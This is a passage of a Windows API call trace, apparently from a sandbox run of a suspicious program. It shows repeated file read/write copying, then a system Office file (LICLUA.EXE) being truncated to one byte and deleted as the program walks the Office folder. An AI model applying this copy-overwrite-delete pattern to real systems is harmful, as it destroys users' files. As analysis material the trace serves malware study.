lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.416] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.416] GetLastError () returned 0x0 [0101.416] SetLastError (dwErrCode=0x0) [0101.416] GetLastError () returned 0x0 [0101.416] SetLastError (dwErrCode=0x0) [0101.416] GetLastError () returned 0x0 [0101.416] SetLastError (dwErrCode=0x0) [0101.416] GetLastError () returned 0x0 [0101.416] SetLastError (dwErrCode=0x0) [0101.416] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.416] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.417] GetLastError () returned 0x0 [0101.417] SetLastError (dwErrCode=0x0) [0101.417] GetLastError () returned 0x0 [0101.417] SetLastError (dwErrCode=0x0) [0101.417] GetLastError () returned 0x0 [0101.417] SetLastError (dwErrCode=0x0) [0101.417] GetLastError () returned 0x0 [0101.417] SetLastError (dwErrCode=0x0) [0101.417] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.417] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.417] GetLastError () returned 0x0 [0101.417] SetLastError (dwErrCode=0x0) [0101.417] GetLastError () returned 0x0 [0101.417] SetLastError (dwErrCode=0x0) [0101.417] GetLastError () returned 0x0 [0101.417] SetLastError (dwErrCode=0x0) [0101.417] GetLastError () returned 0x0 [0101.417] SetLastError (dwErrCode=0x0) [0101.417] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.418] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.418] GetLastError () returned 0x0 [0101.418] SetLastError (dwErrCode=0x0) [0101.418] GetLastError () returned 0x0 [0101.418] SetLastError (dwErrCode=0x0) [0101.418] GetLastError () returned 0x0 [0101.418] SetLastError (dwErrCode=0x0) [0101.418] GetLastError () returned 0x0 [0101.418] SetLastError (dwErrCode=0x0) [0101.418] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.418] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.418] GetLastError () returned 0x0 [0101.418] SetLastError (dwErrCode=0x0) [0101.418] GetLastError () returned 0x0 [0101.418] SetLastError (dwErrCode=0x0) [0101.419] GetLastError () returned 0x0 [0101.419] SetLastError (dwErrCode=0x0) [0101.419] GetLastError () returned 0x0 [0101.419] SetLastError (dwErrCode=0x0) [0101.419] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.419] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.419] GetLastError () returned 0x0 [0101.419] SetLastError (dwErrCode=0x0) [0101.419] GetLastError () returned 0x0 [0101.419] SetLastError (dwErrCode=0x0) [0101.419] GetLastError () returned 0x0 [0101.419] SetLastError (dwErrCode=0x0) [0101.419] GetLastError () returned 0x0 [0101.419] SetLastError (dwErrCode=0x0) [0101.419] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.419] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.420] GetLastError () returned 0x0 [0101.420] SetLastError (dwErrCode=0x0) [0101.420] GetLastError () returned 0x0 [0101.420] SetLastError (dwErrCode=0x0) [0101.420] GetLastError () returned 0x0 [0101.420] SetLastError (dwErrCode=0x0) [0101.420] GetLastError () returned 0x0 [0101.420] SetLastError (dwErrCode=0x0) [0101.420] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.420] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.420] GetLastError () returned 0x0 [0101.420] SetLastError (dwErrCode=0x0) [0101.420] GetLastError () returned 0x0 [0101.420] SetLastError (dwErrCode=0x0) [0101.420] GetLastError () returned 0x0 [0101.420] SetLastError (dwErrCode=0x0) [0101.420] GetLastError () returned 0x0 [0101.420] SetLastError (dwErrCode=0x0) [0101.420] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.421] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.421] GetLastError () returned 0x0 [0101.421] SetLastError (dwErrCode=0x0) [0101.421] GetLastError () returned 0x0 [0101.421] SetLastError (dwErrCode=0x0) [0101.421] GetLastError () returned 0x0 [0101.421] SetLastError (dwErrCode=0x0) [0101.421] GetLastError () returned 0x0 [0101.421] SetLastError (dwErrCode=0x0) [0101.421] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.421] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.421] GetLastError () returned 0x0 [0101.421] SetLastError (dwErrCode=0x0) [0101.421] GetLastError () returned 0x0 [0101.422] SetLastError (dwErrCode=0x0) [0101.422] GetLastError () returned 0x0 [0101.422] SetLastError (dwErrCode=0x0) [0101.422] GetLastError () returned 0x0 [0101.422] SetLastError (dwErrCode=0x0) [0101.422] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.422] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.422] GetLastError () returned 0x0 [0101.422] SetLastError (dwErrCode=0x0) [0101.422] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.422] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.422] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.423] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.423] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.423] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.423] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.423] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.423] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.424] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.424] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.424] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.424] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.424] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.424] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.425] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.426] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.426] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.426] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.426] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.426] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0xcd0, lpOverlapped=0x0) returned 1 [0101.426] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.427] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0101.427] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327ef70*=0xcd0, lpOverlapped=0x0) returned 1 [0101.427] CloseHandle (hObject=0x368) returned 1 [0101.427] CloseHandle (hObject=0x27c) returned 1 [0101.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.431] GetFileType (hFile=0x27c) returned 0x1 [0101.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82ef8 | out: hHeap=0x20000) returned 1 [0101.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0101.431] GetLastError () returned 0xb7 [0101.431] SetLastError (dwErrCode=0xb7) [0101.431] WriteFile (in: hFile=0x27c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0101.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0101.432] CloseHandle (hObject=0x27c) returned 1 [0101.433] AreFileApisANSI () returned 1 [0101.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0101.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x820e8 [0101.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 67 [0101.433] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe")) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0101.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.434] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x95999f42, ftLastAccessTime.dwHighDateTime=0x1d5df27, ftLastWriteTime.dwLowDateTime=0x95999f42, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x0, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 1 [0101.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0101.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0101.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0101.435] AreFileApisANSI () returned 1 [0101.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller", lpUsedDefaultChar=0x0) returned 80 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0101.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0101.436] AreFileApisANSI () returned 1 [0101.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0101.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0101.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8d220, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller") returned 80 [0101.436] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.436] GetLastError () returned 0x5 [0101.436] GetLastError () returned 0x5 [0101.436] SetLastError (dwErrCode=0x5) [0101.436] GetLastError () returned 0x5 [0101.436] SetLastError (dwErrCode=0x5) [0101.436] GetLastError () returned 0x5 [0101.436] SetLastError (dwErrCode=0x5) [0101.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0101.436] AreFileApisANSI () returned 1 [0101.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0101.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d178 [0101.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, 